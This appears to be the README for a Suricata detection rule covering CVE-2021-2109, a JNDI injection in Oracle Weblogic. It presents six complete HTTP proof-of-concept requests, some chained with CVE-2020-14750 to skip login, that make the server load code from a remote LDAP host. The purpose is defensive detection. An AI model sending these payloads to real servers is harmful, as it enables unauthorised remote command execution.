suricata-rules:Suricata针对新的严重漏洞制定规则

## Overview CVE-2021-2109 is a JNDI injection vulnerability in Oracle Weblogic Server. It allows high privileged users, like the administrator account "weblogic", to execute arbitrary commands on the system. Otherwise, if the server is vulnerable to CVE-2020-14750, attackers can exploit CVE-2021-2109 without authenticating. If you cannot determine whether your Oracle Weblogic Servers are using only the default port 7001/TCP for the administration interface, you can use **any any -> any any** in the Suricata rule instead of **any any -> any 7001**. ## Proof of Concept * GET method ``` GET /console/consolejndi.portal?_pageLabel%3DJNDIBindingPageGeneral%26_nfpb%3Dtrue%26JNDIBindingPortlethandle%3Dcom.bea.console.handles.JndiBindingHandle%28%22ldap%3A//10.10.10%3B10%3A443/exploit%3BAdminServer%22%29 HTTP/1.1 Host: example.com:7001 Cookie: ADMINCONSOLESESSION=Igk9iHRPgEo-A62PKQ3AFNK_-_erbLTMHvRAvOtmNkLYtwl3u4UD!-1638211874 Content-Length: 0 ``` * POST method with the payload on the URI ``` POST /console/consolejndi.portal?_pageLabel%3DJNDIBindingPageGeneral%26_nfpb%3Dtrue%26JNDIBindingPortlethandle%3Dcom.bea.console.handles.JndiBindingHandle%28%22ldap%3A//10.10.10%3B10%3A443/exploit%3BAdminServer%22%29 HTTP/1.1 Host: example.com:7001 Cookie: ADMINCONSOLESESSION=Igk9iHRPgEo-A62PKQ3AFNK_-_erbLTMHvRAvOtmNkLYtwl3u4UD!-1638211874 Content-Type: application/x-www-form-urlencoded Content-Length: 0 ``` * POST method with the payload in the body ``` POST /console/consolejndi.portal HTTP/1.1 Host: example.com:7001 Cookie: ADMINCONSOLESESSION=Igk9iHRPgEo-A62PKQ3AFNK_-_erbLTMHvRAvOtmNkLYtwl3u4UD!-1638211874 Content-Type: application/x-www-form-urlencoded Content-Length: 157 _pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://10.10.10;10:443/exploit;AdminServer") ``` * GET method (chains with CVE-2020-14750) ``` GET /console/css/%%32e.%%32fconsolejndi.portal?_pageLabel%3DJNDIBindingPageGeneral%26_nfpb%3Dtrue%26JNDIBindingPortlethandle%3Dcom.bea.console.handles.JndiBindingHandle%28%22ldap%3A//10.10.10%3B10%3A443/exploit%3BAdminServer%22%29 HTTP/1.1 Host: example.com:7001 Content-Length: 0 ``` * POST method with the payload on the URI (chains with CVE-2020-14750) ``` POST /console/css/%%32e.%%32fconsolejndi.portal?_pageLabel%3DJNDIBindingPageGeneral%26_nfpb%3Dtrue%26JNDIBindingPortlethandle%3Dcom.bea.console.handles.JndiBindingHandle%28%22ldap%3A//10.10.10%3B10%3A443/exploit%3BAdminServer%22%29 HTTP/1.1 Host: example.com:7001 Content-Type: application/x-www-form-urlencoded Content-Length: 0 ``` * POST method with the payload in the body (chains with CVE-2020-14750) ``` POST /console/css/%%32e.%%32fconsolejndi.portal HTTP/1.1 Host: example.com:7001 Content-Type: application/x-www-form-urlencoded Content-Length: 157 _pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://10.10.10;10:443/exploit;AdminServer") ``` ## References * https://www.oracle.com/security-alerts/cpujan2021.html * https://www.exploit-db.com/exploits/49461 * https://twitter.com/pyn3rd/status/1351696768065409026 * https://twitter.com/jas502n/status/1352568441136242688